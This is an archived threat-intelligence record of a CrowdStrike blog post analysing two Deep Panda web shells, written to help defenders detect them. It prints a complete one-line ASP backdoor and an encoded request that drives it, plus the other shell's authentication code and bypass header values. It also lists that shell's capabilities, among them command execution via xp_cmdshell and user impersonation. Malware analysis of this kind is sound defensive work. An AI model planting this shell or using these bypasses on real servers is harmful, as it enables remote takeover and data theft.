{ "id": "4c6ca311-41ee-4ea9-b78a-94886b349952", "created_at": "2026-04-06T00:09:57.431451Z", "updated_at": "2026-04-10T13:13:02.174301Z", "deleted_at": null, "sha1_hash": "78d8c0fb0fdf7cf830f19e88397acdf1b781974c", "title": "Mo' Shells Mo' Problems - Deep Panda Web Shells - crowdstrike.com", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 133212, "plain_text": "Mo' Shells Mo' Problems - Deep Panda Web Shells -\r\ncrowdstrike.com\r\nBy RyanJ\r\nArchived: 2026-04-05 16:40:13 UTC\r\nDisclaimer: CrowdStrike derived this information from investigations in non-classified environments.\r\nSince we value our client's privacy and interests, some data has been redacted or sanitized.\r\nCrowdstrike presents “Mo’ Shells Mo’ Problems” - A four part series featuring two unique web shells used by a\r\nChinese threat group we call Deep Panda. The series will culminate with a CrowdCast in April 2014 detailing a\r\ncase study of the incident response investigation conducted to identify these web shells. Special thanks to Josh\r\nPhillips of the CrowdStrike Global Intelligence Team for providing the technical analysis in this blog post. Today\r\nwe’ll cover part one of this series, which provides an overview of what web shells are, functionality of two web\r\nshells recently identified during an incident response investigation and how they were leveraged by the attacker.\r\nParts two through four will provide details on successful analytical techniques you can use to discover web shells\r\nwithin your environment:\r\nMo’ Shells Mo’ Problems: Deep Panda Web Shells (Part 1)\r\nMo’ Shells Mo’ Problems: File Stacking (Part 2)\r\nMo’ Shells Mo’ Problems: Web Log Review (Part 3)\r\nMo’ Shells Mo’ Problems: Network Detection (Part 4)\r\nA Web Shell is a file containing backdoor functionality written in a web scripting language such ASP, ASPX, PHP\r\nor JSP.\r\nWhen a web shell is hosted on an internet facing victim system, an adversary can remotely access the system to\r\nperform malicious actions.\r\nDeep Panda is a China-based threat group CrowdStrike has observed targeting companies in the defense, legal,\r\ntelecommunication and financial industries.\r\nCrowdstrike has observed Deep Panda adopting web shells as their primary access back into a victim\r\norganization.\r\nThis is an interesting shift as web shells have typically been seen as only a first stage into obtaining a persistent\r\nfoothold in an environment.\r\nPreviously, web shells were quickly abandoned once persistent second stage malware was successfully beaconing.\r\nUsing a web shell as a primary backdoor gives Deep Panda several advantages:\r\nLow to virtually no detection by antivirus products\r\nhttp://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/\r\nPage 1 of 6\n\nThe absence of command and control beacon traffic\r\nImpossible to block known malicious IP addresses to a web server since adversary can easily change their\r\nsource IP address\r\nCookie and HTTP header authentication aware web shells avoid being enumerated by search engines and\r\nrestrict access, further reducing their network footprint\r\nTo assist organizations with identifying web shells in their environment, this post will cover two popular Deep\r\nPanda web shells.\r\nBy gaining insight into their capabilities and footprint, organizations should find it feasible to detect and remediate\r\nthese backdoors.\r\nShowimg.asp\r\nPath: E:inetpubwwwroot\u003cRedacted\u003e\r\nMD5 Hash: ffa82c64720179878b25793f17b304d7\r\nFile Size: 28\r\nTable 1: \"Showimg.asp\" Metadata\r\nShowimg.asp is an example of an early stage web shell used to build an initial foothold within a network.\r\nAfter it is replaced by more robust backdoors, it may be left in place as a last resort should remediation take place.\r\nAt a diminutive 28 bytes, it is one of the smallest Active Server Page (ASP) backdoors in the wild.\r\nIn a recent case, we witnessed this web shell written to a standalone file (named showimg.asp), but it could easily\r\nbe injected into an existing page, making it even stealthier.\r\nThe code for this web shell can be found below:\r\n\u003c%execute request(chr(42))%\u003e\r\nTable 2: \"Showimg.asp\" Web Shell Script\r\nASP uses Microsoft Visual Basic (VBScript) as its implementation language.\r\nThe code above uses the chr() function to convert an integer into a character, which is then passed as an argument\r\nto the ASP Request() object. The Request() object will search the Query String for any keys matching the input.\r\nIn our case, the code is equivalent to Request.QueryString(‘*’).\r\nThe request object will look for chr(42) which is an asterisk (*), returning whatever is passed to it in a HTTP GET\r\nor POST. Next, the Execute() function will execute any value returned by the lookup.\r\nEffectively, an attacker can form a request that will execute any VBScript code.\r\nhttp://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/\r\nPage 2 of 6\n\nAs you might imagine, this is a powerful capability.\r\nFor example, this code can perform any of the following actions:\r\nFile upload or download\r\nFile system read, write, or delete\r\nArbitrary command execution\r\nThis web shell is an example of a “thick client” shell, meaning that while the server side code is quite small,\r\nattackers typically use a larger GUI client to construct the sent commands.\r\nThe client GUI runs on the attacker’s system and hence is not typically found within the victim network. As a\r\nsimple example of an encoded command, the following GET request would cause the backdoor to execute the\r\ncode Response.Write(“\u003ch1\u003eHello World\u003c/h1\u003e”) and would render “Hello World” to be printed in the web\r\nbrowser:\r\nhttp://\u003cwebserver\u003e/showimage.asp*=%52%65%73%70%6F%\r\n6E%73%65%2E%57%72%69%74%65%28%22%3C%68%31%3E%48%65\r\n%6C%6C%6F%20%57%6F%72%6C%64%3C%2F%68%31%3E%22%29\r\nTable 3: \"showimg.asp\" Web Shell Script\r\nSystem_web.aspx\r\nPath: C:inetpubwwwrootaspnet_clientsystem_web\u003cVERSION\u003e\r\nMD5 Hash: cc875db104a602e6c12196fe90559fb6\r\nFile Size: 45187\r\nTable 4: Metadata of \"system_web.aspx\" System_web.aspx is an excellent example of a more robust web shell\r\nused to replace Deep Panda’s traditional beaconing command and control infrastructure. It is an ASP.NET\r\nbackdoor written in C#, with far more capabilities than we saw with the showimage.asp sample.\r\nThe web shell supports a form of authentication to protect against unauthorized access.\r\nThis prevents its discovery from search engine indexing, vulnerability scanning tools and other unauthorized\r\naccess to the backdoor.\r\nIn order to bypass authentication, a user session must satisfy one of three options:\r\nPass a cookie with the name \u003cRedacted\u003e\r\nSet the Keep-Alive HTTP header to 320\r\nSet language HTTP header to contain es-DN\r\nSince web shells are text-based, we can easily see how this authentication takes place:\r\nhttp://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/\r\nPage 3 of 6\n\ntry { Init(); if (!IsUserValid()) { try { int.Parse(Request.Cookies\u003c\"REDACTED\"\u003e.Value); Page.Visible = true; }\r\ncatch (Exception) { Page.Visible = false; Response.Clear(); Response.End(); } } else { Page.Visible = true;\r\nResponse.SetCookie(new HttpCookie(\"REDACTED\", DateTime.Now.Second.ToString())); } } catch (Exception)\r\n{ Page.Visible = false; Response.End(); } private void Init() { try { if (Request.Cookies\u003c\"cp\"\u003e != null) {\r\nFile.Copy(Request.PhysicalPath, Request.Cookies\u003c\"cp\"\u003e.Value, true); Response.Cookies\u003c\"cp\"\u003e.Expires =\r\nDateTime.Now.AddDays(-1); Response.End(); } } catch (Exception ex) { Log(ex.ToString()); } } private bool\r\nIsUserValid()\r\n{\r\ntry\r\n{\r\nif (Request.Headers\u003c\"Keep-Alive\"\u003e == \"320\")\r\nreturn true;\r\nif (Request.UserLanguages.Length \u003e 0)\r\n{\r\nforeach (string s in Request.UserLanguages)\r\n{\r\nif (s.IndexOf(\"es-DN\") \u003e= 0)\r\nreturn true;\r\n}\r\n}\r\n}\r\ncatch (Exception)\r\n{\r\nreturn false;\r\n}\r\nreturn false;\r\n}\r\nTable 5: \"system_web.aspx\" Authentication Code\r\nhttp://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/\r\nPage 4 of 6\n\nFirst, the code checks if a cookie by the name of cp exists. If so, the response object has its End() method invoked,\r\ndenying the user access.\r\nNext, the code uses the IsValidUser()method and checks the Hyper Text Transport Protocol (HTTP) headers for\r\nthe Keep-Alive value, which, if equal to 320, will return true. If the value does not equal 320 the\r\nIsValidUser()method iterates over the Request.UserLanguages collection searching for a language named es-DN,\r\nand if found, the IsValidUser() method will return true. If neither check passes, the code returns false and the code\r\nwill finally check for the presence of a cookie named \u003cREDACTED\u003e. If the cookie is present, the authentication\r\nstep is satisfied.\r\nIf not, a blank web page with no content is displayed. After successful authentication, the attacker is provided with\r\nthe following page:\r\nSystem_web.aspx packs a large amount of functionality into a compact interface.\r\nIt provides the following capabilities:\r\nEnumerate attached drives\r\nUtilize built in SQL functions to connect to database backend\r\nRun SQL queries and statements\r\nDownload, upload and read files\r\nDirectory listing\r\nExecute Active Directory requests\r\nCompile and execute arbitrary C# source code\r\nImpersonate a user\r\nThe web shell supports 8 main commands, with most command execution via Transact-SQL using the\r\nxp_cmdshell function. Exec This command depends on the contents of the first unlabeled textbox1. If\r\nunlabeledtextbox1 is empty, the code will enumerate attached drives.\r\nProvider= or Driver= - Will connect using the OleDbConnection class.\r\nData Source= - The code will connect using the SqlConnection class.\r\niis:// - If this appears in unlabeled textbox1, the code will use data from the second unlabeled textbox2 to\r\nexecute Active Directory requests.\r\nDown This command also depends on the text contained in the unlabeled textbox1. If the\r\nhttp://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/\r\nPage 5 of 6\n\nfield is left empty, the code will assume a valid path to a file on the local machine and will read and display\r\ncontents to user.\r\nData Source= - the code will assume that the unlabeled textbox2 contains a valid SQL query and will\r\nexecute it and display the results.\r\nhttp:// - If this appears in unlabeled textbox1, download content from the assumed URL.\r\n$SEX – If this appears in unlabeled textbox1, pass the contents to the Server.Execute() method.\r\nBF Execute contents in unlabeled textbox1 as a SQL query and return binary data to adversary. GF Execute\r\ncontents in unlabeled textbox1 as a SQL statement and return valid textual data to adversary. TF Upload the file\r\nchosen by the Choose File button and save it to a temporary table in the database file worktbl in chunks of 10240\r\nbytes. Then executes xp_cmdshell (which executes the Bulk Copy Program) to copy the data from that table to a\r\nfile whose name is specified in unlabeled textbox2. After the file is saved, the code deletes the temporary table.\r\nRF If unlabeled textbox1 is a local file on infected system, the file is read and displayed to attacker.\r\n\\ - If unlabeled textbox1 starts with \\, use xp_cmdshell to execute the copy command to copy file to\r\n%windir%Temptemp.bin. Then, issue the dir command and display results to user. Finally, delete the\r\ntemporary file %windir%Temptemp.bin.\r\nDIR Perform Active Directory queries. The code handles create, delete, set, get, and enum queries, while any\r\nquery not matching those is executed directly. All commands are executed using the System.DirectoryServices\r\nAPI. Eva Simple wrapper around the CSharpCodeProvider API, allowing the adversary to compile and execute\r\narbitrary C# source code. Login Checkbox Attempt to use the username, password, and domain from the User,\r\nPass and Domain fields and LogonUserA() Win32 API function to impersonate a specific user. Detach Checkbox\r\nSpecifies whether commands run from the Exec button will have their output redirected and displayed to the\r\nadversary when the command is finished executing. In short, system_web.aspx provides an adversary with a very\r\nstealthy means of near full control of the server on which it resides.\r\nThis stealth might be its most important attribute.\r\nAs we will see, identifying web shells can be much harder than finding malicious binaries. In our next post, we\r\nwill discuss techniques for identifying web shells. Stay tuned for Parts 2-4 as we cover File Stacking, Web Log\r\nReview, and Network Detection. In the meantime, register now for the April 1st CrowdCast.\r\nSource: http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/\r\nhttp://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/" ], "report_names": [ "mo-shells-mo-problems-deep-panda-web-shells" ], "threat_actors": [ { "id": "64ca1755-3883-4173-8e0a-6e5cf92faafd", "created_at": "2022-10-25T15:50:23.636456Z", "updated_at": "2026-04-10T02:00:05.389234Z", "deleted_at": null, "main_name": "Deep Panda", "aliases": [ "Deep Panda", "Shell Crew", "KungFu Kittens", "PinkPanther", "Black Vine" ], "source_name": "MITRE:Deep Panda", "tools": [ "Mivast", "StreamEx", "Sakula", "Tasklist", "Derusbi" ], "source_id": "MITRE", "reports": null }, { "id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f", "created_at": "2022-10-25T16:07:23.335869Z", "updated_at": "2026-04-10T02:00:04.547702Z", "deleted_at": null, "main_name": "APT 19", "aliases": [ "APT 19", "Bronze Firestone", "C0d0so0", "Checkered Typhoon", "Codoso", "Deep Panda", "G0009", "G0073", "Operation Kingslayer", "Red Pegasus", "Sunshop Group", "TG-3551" ], "source_name": "ETDA:APT 19", "tools": [ "Agentemis", "C0d0so0", "Cobalt Strike", "CobaltStrike", "Derusbi", "EmPyre", "EmpireProject", "Fire Chili", "PowerShell Empire", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "46a151bd-e4c2-46f9-aee9-ee6942b01098", "created_at": "2023-01-06T13:46:38.288168Z", "updated_at": "2026-04-10T02:00:02.911919Z", "deleted_at": null, "main_name": "APT19", "aliases": [ "DEEP PANDA", "Codoso", "KungFu Kittens", "Group 13", "G0009", "G0073", "Checkered Typhoon", "Black Vine", "TEMP.Avengers", "PinkPanther", "Shell Crew", "BRONZE FIRESTONE", "Sunshop Group" ], "source_name": "MISPGALAXY:APT19", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f2ce5b52-a220-4b94-ab66-4b81f3fed05d", "created_at": "2025-08-07T02:03:24.595597Z", "updated_at": "2026-04-10T02:00:03.740023Z", "deleted_at": null, "main_name": "BRONZE FIRESTONE", "aliases": [ "APT19 ", "C0d0s0", "Checkered Typhoon ", "Chlorine ", "Deep Panda ", "Pupa ", "TG-3551 " ], "source_name": "Secureworks:BRONZE FIRESTONE", "tools": [ "9002", "Alice's Rabbit Hole", "Cobalt Strike", "Derusbi", "PlugX", "PoisonIvy", "PowerShell Empire", "Trojan Briba", "Zuguo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434197, "ts_updated_at": 1775826782, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/78d8c0fb0fdf7cf830f19e88397acdf1b781974c.pdf", "text": "https://archive.orkl.eu/78d8c0fb0fdf7cf830f19e88397acdf1b781974c.txt", "img": "https://archive.orkl.eu/78d8c0fb0fdf7cf830f19e88397acdf1b781974c.jpg" } }